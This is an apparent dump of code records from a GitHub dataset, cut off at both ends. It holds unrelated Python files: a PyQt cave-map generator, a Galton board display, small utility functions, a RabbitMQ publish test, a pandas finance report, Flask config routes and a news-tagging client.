range(0, len(totalstr)):\n __gotoxy(total_x, total_y + c)\n print(\"%c\" % totalstr[c])\n sys.stdout.flush()\n\n total_x += 2\n\n # show ball count\n __gotoxy(2, bottom_of_bucket + 4)\n print(\"Ball %d of %d\" % (count, gb.ballcount))\n sys.stdout.flush()\n","repo_name":"CodeDrome/galton-board-python","sub_path":"galtonboardview.py","file_name":"galtonboardview.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"31606992470","text":"import random\n\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog\nfrom PyQt5 import QtGui\nfrom PIL import Image, ImageDraw, ImageOps\nfrom PIL.ImageQt import ImageQt\n\nfrom MainWindow import Ui_MainWindow\nimport mapgen\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n def __init__(self, *args, obj=None, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n self.setupUi(self)\n self.view_combobox.addItems(\n ['Map view', 
'Height view', 'Spoiler mode'])\n self.view_combobox.currentTextChanged.connect(self.updateView)\n self.randomize_button.clicked.connect(self.randomize_input)\n self.generate_button.clicked.connect(self.new_map)\n self.save_button.clicked.connect(self.saveFile)\n self.seed_lineEdit.textEdited.connect(self.setSeed)\n\n # Start the map generator\n self.map_generator = mapgen.Mapgen()\n\n # Set up resizing the map preview\n self.map_preview.resizeEvent = self.displayPreview\n\n # Which preview are we showing?\n self.view = 'Map view'\n\n # Set up the inputs\n self.map_size_slider.valueChanged.connect(self.update_map_size)\n self.biome_combobox.addItems(['rock', 'ice', 'lava'])\n self.biome_combobox.currentTextChanged.connect(self.update_biome)\n self.solid_rock_slider.valueChanged.connect(self.update_solid_rock)\n self.other_rock_slider.valueChanged.connect(self.update_other_rock)\n self.energy_crystals_slider.valueChanged.connect(self.update_energy_crystals)\n self.ore_slider.valueChanged.connect(self.update_ore)\n self.ecs_slider.valueChanged.connect(self.update_ecs)\n self.os_slider.valueChanged.connect(self.update_os)\n self.rs_slider.valueChanged.connect(self.update_rs)\n self.flood_level_slider.valueChanged.connect(self.update_flood_level)\n self.flood_type_combobox.addItems(['water', 'lava'])\n self.flood_type_combobox.currentTextChanged.connect(self.update_flood_type)\n self.erosion_sources_slider.valueChanged.connect(self.update_erosion_sources)\n self.landslide_sources_slider.valueChanged.connect(self.update_landslide_sources)\n self.slugs_slider.valueChanged.connect(self.update_slugs)\n\n # Set a lock to prevent updates\n self.generator_locked = False\n\n # Set the input values\n self.set_input_values()\n\n self.generate_map()\n\n def set_input_values(self):\n\n # Lock\n self.generator_locked = True\n\n # Update each input\n self.map_size_slider.setValue(\n self.map_generator.parameters['size'] // 8)\n self.biome_combobox.setCurrentText(self.map_generator.parameters['biome'])\n self.solid_rock_slider.setValue(\n int((self.map_generator.parameters['solidDensity'] - 0.2) / 0.004))\n self.other_rock_slider.setValue(\n int((self.map_generator.parameters['wallDensity'] - 0.2) / 0.004))\n self.energy_crystals_slider.setValue(\n int(self.map_generator.parameters['crystalDensity'] / 0.008))\n self.ore_slider.setValue(\n int(self.map_generator.parameters['oreDensity'] / 0.008))\n self.ecs_slider.setValue(\n int(self.map_generator.parameters['crystalSeamDensity'] / 0.006))\n self.os_slider.setValue(\n int(self.map_generator.parameters['oreSeamDensity'] / 0.006))\n self.rs_slider.setValue(\n int(self.map_generator.parameters['rechargeSeamDensity'] / 0.003))\n self.flood_level_slider.setValue(\n int(self.map_generator.parameters['floodLevel'] * 100))\n self.flood_type_combobox.setCurrentText(self.map_generator.parameters['floodType'])\n self.erosion_sources_slider.setValue(\n int(self.map_generator.parameters['flowDensity'] * 1000))\n self.landslide_sources_slider.setValue(\n int(self.map_generator.parameters['landslideDensity'] / 0.004))\n self.slugs_slider.setValue(\n int(self.map_generator.parameters['slugDensity'] / 0.001))\n\n # Unlock\n self.generator_locked = False\n\n def generate_map(self):\n if not self.generator_locked:\n success = self.map_generator.mapgen()\n self.seed_lineEdit.setText(self.map_generator.seed)\n self.displayPreview()\n\n # Enable/disable the save button\n if success:\n self.save_button.setEnabled(True)\n self.save_button.setToolTip('')\n else:\n 
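# [added comment] generation failed (e.g. no tool store could be placed), so block saving\n                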
self.save_button.setEnabled(False)\n self.save_button.setToolTip('Can\\'t save maps with no tool store')\n\n def randomize_input(self):\n size = self.map_generator.parameters['size']\n self.map_generator.init_parameters()\n self.map_generator.parameters['size'] = size\n self.set_input_values()\n self.new_map()\n\n def new_map(self):\n self.map_generator.seed = str(random.randint(0, 2 ** 64))\n self.generate_map()\n\n # Save the output to a file\n def saveFile(self):\n\n # Set up the save dialog\n save_dialog = QFileDialog()\n save_dialog.setAcceptMode(QFileDialog.AcceptSave)\n save_dialog.setWindowTitle('Save Map')\n save_dialog.setNameFilter('Manic Miners level files (*.dat)')\n save_dialog.setDefaultSuffix('dat')\n if save_dialog.exec():\n\n # Save the file\n filename = save_dialog.selectedFiles()[0]\n output_file = open(filename, 'w')\n output_file.write(self.map_generator.mm_text())\n output_file.close()\n\n # Set the random seed\n\n def setSeed(self, value):\n self.map_generator.seed = value\n self.generate_map()\n\n\n def updateView(self, value):\n self.view = value\n self.displayPreview()\n\n # Display a preview in the preview window\n\n def displayPreview(self, e=None):\n if self.view == 'Map view':\n self.displayPreviewMap()\n\n if self.view == 'Height view':\n self.displayPreviewHeight()\n\n if self.view == 'Spoiler mode':\n self.displayNoPreview()\n\n # Display a black screen\n def displayNoPreview(self):\n\n # Create the image\n img = Image.new('RGBA', (1, 1), color=(0, 0, 0, 0))\n\n # Display the image\n image = ImageQt(img)\n pixmap = QtGui.QPixmap.fromImage(image).copy()\n self.map_preview.setPixmap(pixmap)\n\n\n # Display a preview of the heightmap\n\n def displayPreviewHeight(self):\n width = self.map_preview.width()\n height = self.map_preview.height()\n square_size = min(width, height)\n\n # Layers\n heightArray = self.map_generator.data[\"height_array\"]\n\n # Find the range of heights\n lowest = heightArray[0][0]\n highest = heightArray[0][0]\n\n for i in range(len(heightArray) * len(heightArray[0])):\n lowest = min(\n lowest, heightArray[i // len(heightArray)][i % len(heightArray[0])])\n highest = max(\n highest, heightArray[i // len(heightArray)][i % len(heightArray[0])])\n\n highest = max(highest, abs(lowest))\n lowest = -highest\n\n heightRange = highest - lowest\n\n # Create the image\n scale = square_size // len(heightArray)\n offset = square_size % len(heightArray) // 2\n img = Image.new('RGBA',\n (square_size,\n square_size),\n color=(0, 0, 0, 0))\n draw = ImageDraw.Draw(img)\n\n # Draw the background\n draw.rectangle([offset,\n offset,\n square_size - offset,\n square_size - offset],\n fill=(0, 0, 0))\n\n # Draw the tiles\n for i in range(len(heightArray)):\n for j in range(len(heightArray[0])):\n # Draw the tile\n draw.rectangle([j * scale + offset + 1,\n i * scale + offset + 1,\n j * scale + offset + (scale - 1),\n i * scale + offset + (scale - 1)],\n # low = blue, high = red\n fill='hsl(' + str(250-(heightArray[i][j] - lowest) / heightRange * 250) + ', 100%, 50%)')\n # fill=(0, int((heightArray[i][j] - lowest) / heightRange * 256), 0))\n\n # Center the image\n border_x = (width - square_size) // 2\n border_y = (height - square_size) // 2\n img = ImageOps.expand(img, border=(\n border_x, border_y, border_x, border_y), fill=(0, 0, 0, 0))\n\n # Display the image\n image = ImageQt(img)\n pixmap = QtGui.QPixmap.fromImage(image).copy()\n self.map_preview.setPixmap(pixmap)\n\n # Display a preview of the wall/floor tiles and resources\n def 
displayPreviewMap(self):\n\n width = self.map_preview.width()\n height = self.map_preview.height()\n square_size = min(width, height)\n\n # Layers\n wallArray = self.map_generator.data[\"wall_array\"]\n crystalArray = self.map_generator.data[\"crystal_array\"]\n oreArray = self.map_generator.data[\"ore_array\"]\n\n # Create the image\n scale = square_size // len(wallArray)\n offset = square_size % len(wallArray) // 2\n img = Image.new('RGBA',\n (square_size,\n square_size),\n color=(0, 0, 0, 0))\n draw = ImageDraw.Draw(img)\n\n # Color conversions\n colors = {\n 0: (24, 0, 59), # Ground\n 1: (166, 72, 233), # Dirt\n 2: (139, 43, 199), # Loose Rock\n 3: (108, 10, 163), # Hard Rock\n 4: (59, 0, 108), # Solid Rock\n 6: (6, 45, 182), # Water\n 7: (239, 79, 16), # Lava\n 8: (56, 44, 73), # Landslide rubble\n 9: (150, 150, 0), # Slimy Slug hole\n 10: (185, 255, 25), # Energy Crystal Seam\n 11: (146, 62, 20), # Ore Seam\n 12: (250, 255, 14), # Recharge Seam\n 13: (190, 190, 190), # Building power path\n }\n\n # Draw the background\n draw.rectangle([offset,\n offset,\n square_size - offset,\n square_size - offset],\n fill=(0, 0, 0))\n\n # Draw the tiles\n for i in range(len(wallArray)):\n for j in range(len(wallArray[0])):\n # Draw the tile\n draw.rectangle([j * scale + offset + 1,\n i * scale + offset + 1,\n j * scale + offset + (scale - 1),\n i * scale + offset + (scale - 1)],\n fill=colors[wallArray[i][j]])\n\n # Draw the crystal and ore indicators\n if crystalArray[i][j] > 0:\n draw.rectangle([\n j * scale + offset + 2,\n i * scale + offset + 4,\n j * scale + offset + 4,\n i * scale + offset + 2],\n fill=colors[10])\n if oreArray[i][j] > 0:\n draw.rectangle([\n j * scale + offset + 5,\n i * scale + offset + 4,\n j * scale + offset + 7,\n i * scale + offset + 2],\n fill=colors[11])\n\n # Center the image\n border_x = (width - square_size) // 2\n border_y = (height - square_size) // 2\n img = ImageOps.expand(img, border=(\n border_x, border_y, border_x, border_y), fill=(0, 0, 0, 0))\n\n # Display the image\n image = ImageQt(img)\n pixmap = QtGui.QPixmap.fromImage(image).copy()\n self.map_preview.setPixmap(pixmap)\n\n def update_map_size(self, value):\n value *= 8\n self.map_generator.parameters['size'] = value\n self.generate_map()\n\n def update_biome(self, value):\n self.map_generator.parameters['biome'] = value\n\n def update_solid_rock(self, value):\n value = value * 0.004 + 0.2\n self.map_generator.parameters['solidDensity'] = value\n self.generate_map()\n\n def update_other_rock(self, value):\n value = value * 0.004 + 0.2\n self.map_generator.parameters['wallDensity'] = value\n self.generate_map()\n\n def update_energy_crystals(self, value):\n value = value * 0.008\n self.map_generator.parameters['crystalDensity'] = value\n self.generate_map()\n\n def update_ore(self, value):\n value = value * 0.008\n self.map_generator.parameters['oreDensity'] = value\n self.generate_map()\n\n def update_ecs(self, value):\n value = value * 0.006\n self.map_generator.parameters['crystalSeamDensity'] = value\n self.generate_map()\n\n def update_os(self, value):\n value = value * 0.006\n self.map_generator.parameters['oreSeamDensity'] = value\n self.generate_map()\n\n def update_rs(self, value):\n value = value * 0.003\n self.map_generator.parameters['rechargeSeamDensity'] = value\n self.generate_map()\n\n def update_flood_level(self, value):\n value = value / 100\n self.map_generator.parameters['floodLevel'] = value\n self.generate_map()\n\n def update_flood_type(self, value):\n 
self.map_generator.parameters['floodType'] = value\n        self.generate_map()\n\n    def update_erosion_sources(self, value):\n        value = value / 1000\n        self.map_generator.parameters['flowDensity'] = value\n        self.generate_map()\n\n    def update_landslide_sources(self, value):\n        value = value * 0.004\n        self.map_generator.parameters['landslideDensity'] = value\n        self.generate_map()\n\n    def update_slugs(self, value):\n        value = value * 0.001\n        self.map_generator.parameters['slugDensity'] = value\n        self.generate_map()\n\n\n# Do the thing\nif __name__ == '__main__':\n    app = QApplication([])\n    window = MainWindow()\n    window.show()\n    app.exec()\n","repo_name":"vyldr/map-generator","sub_path":"map-generator.py","file_name":"map-generator.py","file_ext":"py","file_size_in_byte":14253,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
{"seq_id":"5397391831","text":"from math import sqrt\r\n\r\n\r\ndef arithmetic(a1:float,sym:str,a2:float)->any:\r\n    \"\"\"Simple calculator\r\n    + - addition, - - subtraction, * - multiplication, / - division\r\n    :param float a1: First number\r\n    :param float a2: Second number\r\n    :param str sym: Operation\r\n    :rtype: var Unspecified type\r\n    \"\"\"\r\n    if sym in [\"+\",\"-\",\"/\",\"*\"]:\r\n        if sym==\"/\" and a2==0:\r\n            vas=\"Div/0\"\r\n        else:\r\n            vas = eval(str(a1)+sym+str(a2))\r\n    else:\r\n        vas = \"Unknown operation!\"\r\n    return vas\r\n\r\ndef is_year_leap(aasta:int)->bool:\r\n    \"\"\"\r\n    Leap year detection\r\n    Returns True if the year is a leap year and False if it is not\r\n    :param int aasta: Year number\r\n    :rtype: bool Function result in boolean format\r\n    \"\"\"\r\n    aasta = int(aasta)\r\n    # Gregorian rule: divisible by 4, except century years not divisible by 400\r\n    return aasta % 4 == 0 and (aasta % 100 != 0 or aasta % 400 == 0)\r\n\r\ndef square(a:float)->float:\r\n    \"\"\"Finding the perimeter, area and diagonal of a square\r\n    :param float number: Your number\r\n    :rtype:\r\n    \"\"\"\r\n    try:\r\n        a=float(a)\r\n        if a>0:\r\n            P = 4*a\r\n            S = a**2\r\n            d = a*sqrt(2)\r\n            return P,S,d\r\n        else:\r\n            v=\"----\"\r\n            return v\r\n    except:\r\n        v=\"---\"\r\n        return v\r\n\r\n\r\ndef season(num):\r\n    if num == 12 or 1 <= num <= 2:\r\n        print(\"Winter\")\r\n    elif 3 <= num <= 5:\r\n        print(\"Spring\")\r\n    elif 6 <= num <= 8:\r\n        print(\"Summer\")\r\n    elif 9 <= num <= 11:\r\n        print(\"Autumn\")\r\n    else:\r\n        print(\"Invalid data\")\r\n\r\ndef bank(n, y):\r\n    \"\"\"Bank interest calculator: deposit n at 10% yearly interest for y years\r\n    \"\"\"\r\n    raha = n\r\n    # compound 10% interest once per year\r\n    for _ in range(int(y)):\r\n        raha = raha * 1.1\r\n    print(raha)\r\n    return raha\r\n","repo_name":"RainonC/programmeerimise-alused","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"7122811531","text":"#!/usr/bin/python\n# Classification (U)\n\n\"\"\"Program: blackbox_publish.py\n\n    Description: Blackbox testing of rmq_2_isse.py program.\n\n    Usage:\n        test/blackbox/rmq_2_isse/blackbox_publish.py\n\n    Arguments:\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\nimport os\nimport sys\nimport time\n\n# Third-party\n\n# Local\nsys.path.append(os.getcwd())\nimport rabbit_lib.rabbitmq_class as rabbitmq_class\nimport lib.gen_libs as gen_libs\nimport version\n\n__version__ = version.__version__\n\n\ndef create_rq_pub(cfg, **kwargs):\n\n    \"\"\"Function: create_rq_pub\n\n    Description: Create a RabbitMQ Publisher instance.\n\n    Arguments:\n        (input) cfg -> 
Configuration settings module for the program.\n (output) rq -> RabbitMQ Publisher instance\n\n \"\"\"\n\n rq = rabbitmq_class.RabbitMQPub(cfg.user, cfg.passwd, cfg.host, cfg.port,\n cfg.exchange_name, cfg.exchange_type,\n cfg.queue_name, cfg.queue_name,\n cfg.x_durable, cfg.q_durable,\n cfg.auto_delete)\n\n connect_status, err_msg = rq.create_connection()\n\n if connect_status and rq.channel.is_open:\n return rq\n\n else:\n print(\"Error: Failed to connect to RabbitMQ as Publisher.\")\n return None\n\n\ndef publish_message(rq, f_name, **kwargs):\n\n \"\"\"Function: publish_message\n\n Description: Publish a message to RabbitMQ queue.\n\n Arguments:\n (input) rq -> RabbitMQ Publisher instance\n (input) f_name -> File name of test file.\n (output) status -> True|False - Success of the test.\n (output) err_msg -> Error message or None.\n\n \"\"\"\n\n status = True\n err_msg = None\n\n if not rq.publish_msg(f_name):\n err_msg = \"\\tError: Failed to publish message to RabbitMQ.\"\n status = False\n\n time.sleep(1)\n\n return status, err_msg\n\n\ndef publish(rq, **kwargs):\n\n \"\"\"Function: publish\n\n Description: Publish test message to RabbitMQ queue.\n\n Arguments:\n (input) rq -> RabbitMQ Publisher instance\n\n \"\"\"\n\n f_name = \"file13\"\n\n status, err_msg = publish_message(rq, f_name)\n\n if not status:\n print(err_msg)\n print(\"\\tPublish failed\\n\")\n\n\ndef main():\n\n \"\"\"Function: main\n\n Description: Control the blackbox testing of rmq_2_isse.py program.\n\n Variables:\n status -> True|False - If connection to RabbitMQ was created.\n base_dir -> Directory path to blackbox testing directory.\n test_path -> Current full directory path, including base_dir.\n config_path -> Directory path to config, including test_path.\n\n Arguments:\n\n \"\"\"\n\n base_dir = \"test/blackbox/rmq_2_isse\"\n test_path = os.path.join(os.getcwd(), base_dir)\n config_path = os.path.join(test_path, \"config\")\n\n cfg = gen_libs.load_module(\"rabbitmq\", config_path)\n\n rq = create_rq_pub(cfg)\n\n if not rq:\n print(\"Error: Failed to create RabbitMQ Publisher instance\")\n\n else:\n publish(rq)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"mjpernot/rabbitmq-isse","sub_path":"test/blackbox/rmq_2_isse/blackbox_publish.py","file_name":"blackbox_publish.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22284722091","text":"from timeit import default_timer as timer\n\n\ndef get_financial_otc_trade(parties_df, position, risk, cash_flows, headers, ip):\n parties = parties_df.set_index('legalName')\n report = position[\n ['tradeId', 'bookName', 'counterPartyName', 'tradeDate', 'asset.expirationDate', 'asset.direction',\n 'asset.underlyerInstrumentId', 'asset.notionalAmount', 'actualPremium', 'positionId', 'tradeStatus']]\n report.columns = ['optionName', 'bookName', 'client', 'dealStartDate', 'expiry', 'side', 'baseContract',\n 'nominalPrice', 'beginPremium', 'positionId', 'status']\n start = timer()\n report = report.merge(risk[['price']].reset_index(), on='positionId', how='left')\n report['baseContract'].fillna('', inplace=True)\n report.fillna(0, inplace=True)\n report['beginPremium'] = abs(report['beginPremium'])\n report.rename(columns={'price': 'endPremium'}, inplace=True)\n end = timer()\n print('\\tmerge risk and position takes ' + str(end - start) + ' seconds')\n start = timer()\n report['assetType'] = report.apply(\n lambda row: 'STOCK' if row.get('baseContract', 
'').endswith('.SZ') or row.get('baseContract', '').endswith(\n '.SH') or row.get('baseContract', '').endswith('.CFE') else 'COMMODITY', axis=1)\n cash_flows.set_index('positionId', inplace=True)\n end = timer()\n print('\\t compute assetType takes ' + str(end - start) + ' seconds')\n start = timer()\n report['endDate'] = report.apply(\n lambda row: cash_flows.loc[row['positionId'], 'timestamp'] if row['positionId'] in cash_flows.index and\n row['status'] != 'LIVE' else '', axis=1)\n end = timer()\n print('\\t compute endDate takes ' + str(end - start) + ' seconds')\n start = timer()\n report['masterAgreementId'] = report.apply(lambda row: parties.loc[row['client']]['masterAgreementId'], axis=1)\n end = timer()\n print('\\t compute masterAgreementId takes ' + str(end - start) + ' seconds')\n start = timer()\n report['totalPremium'] = report.apply(\n lambda row: row['beginPremium'] + row['endPremium'] if row['side'] == 'SELLER' else row['endPremium'] - row[\n 'beginPremium'], axis=1).fillna(0)\n end = timer()\n print('\\t compute totalPremium takes ' + str(end - start) + ' seconds')\n return report.fillna(0)\n","repo_name":"zhanrendong/jkzx1","sub_path":"scripts/airflow/report/eod/eod_finance_trade_report_pd.py","file_name":"eod_finance_trade_report_pd.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12340854701","text":"#########################\n# Title: Problem Set 4 #\n# Nicole Zatorski #\n#########################\n\n# We will calculate the flux due to a charged sphere in space through a plane.\n\nfrom math import sqrt, pi, sin, atan2\nE0 = 8.854187817e-12 \nk = 1.0 / (4 * pi * E0)\n\npos_sphere = [0, 0, 0]\nq_sphere = 10e-6\n\n\n# the dE_list is the jhat-component of the electric field because the other\n# components don't contribute to flux\n\n\ndef F():\n plane = ((2.0, 2.0, 1.0), (-2.0, -2.0, 1.0), (2.0, -2.0, 1.0), (-2.0, 2.0, 1.0)) # Position of the verticies of the square\n Lx = (plane[1][0] - plane[0][0])**2 # Length of the sides of the square\n Ly = (plane[1][1] - plane[0][1])**2\n area = (plane[0][0] - plane[1][0]) * (plane[0][1] - plane[1][1]) # Area of the square\n distance = sqrt(Lx + Ly)\n dx = 1.0e-3 # Integral increment length\n dy = 1.0e-3 \n dEx_list = [] # Differential contributions\n dEy_list = [] \n## for i in xrange(int(sqrt(Lx) / dx)): # Create our integration iterable\n## theta = atan2(1, i)\n## E_sphere = ((k * q_sphere) / (distance ** 2)) * sin (theta)\n## dEx_list.append(E_sphere)\n## for elt in dEx_list:\n for i in xrange(int(sqrt(Lx) / dx)): # Taking all of the partitions of x\n for j in xrange(int(sqrt(Ly) / dy)): # and calculating the electric field for \n theta = atan2(1, i*distance) # the corresponding line of y values\n E_sphere = ((k * q_sphere) / (distance ** 2)) * sin (theta) # The j hat component of the electric field\n dEy_list.append(E_sphere)\n E = sum(dEy_list)\n F = E * area\n return F # Total Flux\n\ndef vector(F):\n plane = ((2.0, 2.0, 1.0), (-2.0, -2.0, 1.0), (2.0, -2.0, 1.0), (-2.0, 2.0, 1.0))\n area = (plane[0][0] - plane[1][0]) * (plane[0][1] - plane[1][1])\n Eforce = F *(10.0e-3) # E (which is flux divided by area) multiplied\n g = 9.80665 # by charge (which is sigma times area is force\n mass = Eforce/g # Sum of forces is 0, so electric field force equals \n return mass # gravitational 
force\n","repo_name":"Zatorski/NicoleZatorski_python_seminar","sub_path":"Problem_Set_4.py","file_name":"Problem_Set_4.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15282041458","text":"from django_filters.rest_framework import (\n filters,\n FilterSet,\n)\n\nfrom post.models import Post\n\n\nclass PostFilter(FilterSet):\n\n class Meta:\n model = Post\n fields = ('is_draft', 'is_deleted', 'category')\n\n # tags = filters.ModelMultipleChoiceFilter(\n # queryset=Tag.objects.all(),\n # method='filter_tags'\n # )\n\n category = filters.CharFilter(\n field_name='category__title__in', method='filter_by_category',\n )\n\n @staticmethod\n def filter_by_category(queryset, field_name: str, value: str):\n \"\"\" Фильтрация по тегу\n \"\"\"\n if value:\n queryset = queryset.filter(**{field_name: value.split(',')})\n return queryset.distinct()\n","repo_name":"AlertRED/blog-django-vue","sub_path":"backend/post/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8001890089","text":"from PIL import Image\nfrom pylab import *\nfrom scipy.ndimage import filters\n#from SciPy import misc\nfrom PCV.tools import imtools\n\nim = array(Image.open('../data/empire.jpg').convert('L'))\n#im = misc.lena()\nim2, cdf = imtools.histeq(im)\nim3 = np.uint8(255 * (im / (filters.gaussian_filter(im, 400) + 0.00001)))\n\nfigure()\nsubplot(231)\naxis('off')\ngray()\ntitle('original')\nimshow(im)\n\nsubplot(234)\naxis('off')\ntitle('original hist')\n#hist(im.flatten(), 128, cumulative=True, normed=True)\nhist(im.flatten(), 128, normed=True)\n\nsubplot(232)\naxis('off')\ngray()\ntitle('histogram-equalized')\nimshow(im2)\n\nsubplot(235)\naxis('off')\ntitle('equalized hist')\n#hist(im2.flatten(), 128, cumulative=True, normed=True)\nhist(im2.flatten(), 128, normed=True)\n\nsubplot(233)\naxis('off')\ngray()\ntitle('quotient image')\nimshow(im3)\n\nsubplot(236)\naxis('off')\ntitle('quotient hist')\nhist(im3.flatten(), 128, normed=True)\n\nshow()\n","repo_name":"willard-yuan/pcv-book-code","sub_path":"ch01/ch01_ex03_quotim.py","file_name":"ch01_ex03_quotim.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":492,"dataset":"github-code","pt":"37"} +{"seq_id":"70860411628","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom flask import Blueprint, request, jsonify, send_file\r\nfrom app.decorators import *\r\nfrom app.classes.config import Config\r\nimport sys\r\n\r\nconfig_bp = Blueprint(\"config\", __name__)\r\nconfig = Config()\r\n\r\n\r\n@config_bp.route('/switch//', methods=['GET'])\r\n@require_header_token\r\ndef switch(cat, key):\r\n \"\"\"\r\n Switch the Boolean value of a configuration key.\r\n :return: status in JSON\r\n \"\"\"\r\n try:\r\n value = config.read_config((cat, key))\r\n if value:\r\n config.write_config(cat, key, False)\r\n res = {\"status\": True,\r\n \"message\": \"Key switched to false\"}\r\n else:\r\n config.write_config(cat, key, True)\r\n res = {\"status\": True,\r\n \"message\": \"Key switched to true\"}\r\n except:\r\n res = {\"status\": True,\r\n \"message\": \"Issue while changing value\"}\r\n\r\n return jsonify(res)\r\n\r\n\r\n@config_bp.route('/edit///', methods=['GET'])\r\n@require_header_token\r\ndef edit(cat, key, value):\r\n \"\"\"\r\n Edit the string (or array) value of a configuration 
key.\r\n :return: status in JSON\r\n \"\"\"\r\n return jsonify(config.write_config(cat, key, value))\r\n\r\n\r\n@config_bp.route('/db/export', methods=['GET'])\r\n@require_get_token\r\ndef export_db():\r\n \"\"\"\r\n Export the database.\r\n :return: current database as attachment\r\n \"\"\"\r\n return config.export_db()\r\n\r\n\r\n@config_bp.route('/db/import', methods=['POST'])\r\n@require_header_token\r\ndef import_db():\r\n \"\"\"\r\n Import a database and replace the existant.\r\n :return: status in JSON\r\n \"\"\"\r\n try:\r\n f = request.files[\"file\"]\r\n assert f.read(15) == b\"SQLite format 3\"\r\n d = \"/\".join(sys.path[0].split(\"/\")[:-2])\r\n f.save(\"/{}/tinycheck.sqlite3\".format(d))\r\n res = {\"status\": True,\r\n \"message\": \"Database updated\"}\r\n except:\r\n res = {\"status\": False,\r\n \"message\": \"Error while database upload\"}\r\n return jsonify(res)\r\n\r\n\r\n@config_bp.route('/list', methods=['GET'])\r\ndef list():\r\n \"\"\"\r\n List key, values of the configuration\r\n :return: configuration in JSON\r\n \"\"\"\r\n res = config.export_config()\r\n res[\"backend\"][\"password\"] = \"\"\r\n return jsonify(res)\r\n","repo_name":"KasperskyLab/TinyCheck","sub_path":"server/backend/app/blueprints/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":2951,"dataset":"github-code","pt":"37"} +{"seq_id":"71175972909","text":"# -*- coding: utf-8 -*-\nimport jieba.posseg\nimport ConfigParser\nimport base64\nimport redis\nimport json\nimport time\nimport sys\nimport os\nfrom thrift.transport import TTransport, TSocket\nfrom thrift.protocol import TCompactProtocol\nsys.path.append('tags/src')\nsys.path.append('tool')\nfrom rpcservice import TagRPCService\nfrom mail_sender import send_mail\n\n\nPATH_CURRENT = os.path.realpath('.')\nPATH_TRUNK = PATH_CURRENT[:PATH_CURRENT.rfind('/cn')]\nCONFIG_NEWS = '%s/cn/config/news.conf' % PATH_TRUNK\nparser_config = ConfigParser.ConfigParser()\nparser_config.read(CONFIG_NEWS)\nREDIS_SERVER = parser_config.get('Settings', 'REDIS_SERVER')\nREDIS_PORT = int(parser_config.get('Settings', 'REDIS_PORT'))\nREDIS_DB = int(parser_config.get('Settings', 'REDIS_DB'))\nREDIS_DB_NEWS = int(parser_config.get('Settings', 'REDIS_DB_NEWS'))\nREDIS_CLIENT = redis.Redis(REDIS_SERVER, REDIS_PORT, REDIS_DB)\nREDIS_CLIENT_NEWS = redis.Redis(REDIS_SERVER, REDIS_PORT, REDIS_DB_NEWS)\nTAGS_MODEL_VERSION = parser_config.get('Settings', 'TAGS_MODEL_VERSION')\n\n\nclass TagsClient:\n\n def __init__(self, server, port, retry_times, retry_interval):\n transport = TSocket.TSocket(server, port)\n self.tags_transport = TTransport.TBufferedTransport(transport)\n protocol = TCompactProtocol.TCompactProtocol(self.tags_transport)\n self.tags_client = TagRPCService.Client(protocol)\n self.tags_retry_times = retry_times\n self.tags_retry_interval = retry_interval\n\n def get_tags_from_news(self, news_info):\n tags, model_version = self.get_tags_from_redis(news_info['account'])\n if tags is not None:\n return tags, model_version\n contents = ''.join([content['text'] for content in news_info['content'] if 'text' in content])\n info = {\n 'account': news_info['account'],\n 'content_tokens': self.split_words(contents),\n 'title_tokens': self.split_words(news_info['title']),\n 'source': news_info['subtitle'],\n 'subtitle': news_info['subtitle'],\n }\n info_json = json.dumps(info, ensure_ascii=False, sort_keys=True).encode('utf8')\n for times in range(self.tags_retry_times):\n try:\n 
tags_result = json.loads(self.get_tags_from_server(info_json))\n except TTransport.TTransportException:\n time.sleep(self.tags_retry_interval)\n continue\n if tags_result['status'] == 200:\n tags = []\n for tags_info in tags_result['tags']:\n tags.append(tags_info[0])\n return tags, tags_result['model_version']\n else:\n subject = '{Matrix}{feeds}{tags client error}'\n message = 'Invalid Return Code %s' % tags_result['status']\n send_mail(subject, message)\n return None, ''\n subject = '{Matrix}{feeds}{lost tags server}'\n message = 'Server Lost\\nSpider Name: %s\\nRetry Times: %s\\nRetry Interval: %s\\n' % \\\n ('breaking_news', self.tags_retry_times, self.tags_retry_interval)\n send_mail(subject, message)\n return None, ''\n\n @staticmethod\n def get_tags_from_redis(account):\n model_version = REDIS_CLIENT.get(TAGS_MODEL_VERSION)\n raw = REDIS_CLIENT_NEWS.get(account)\n if not raw:\n return None, ''\n news_info = json.loads(base64.b64decode(raw))\n if not news_info.get('model_version', '') == model_version:\n return None, model_version\n return news_info.get('tags'), news_info.get('model_version', '')\n\n def get_tags_from_server(self, info_json):\n self.tags_transport.open()\n tags_result = self.tags_client.gen_tags(info_json)\n self.tags_transport.close()\n return tags_result\n\n @staticmethod\n def split_words(text):\n return [unicode(word) for word in jieba.posseg.cut(text)]\n","repo_name":"dxyist/funssy_spider","sub_path":"util/tags_util.py","file_name":"tags_util.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71353549226","text":"import random\nimport string\nimport time\nimport binascii\nimport collections\nimport cryptopals\n\n\ndef time_it(method):\n \"\"\"\n 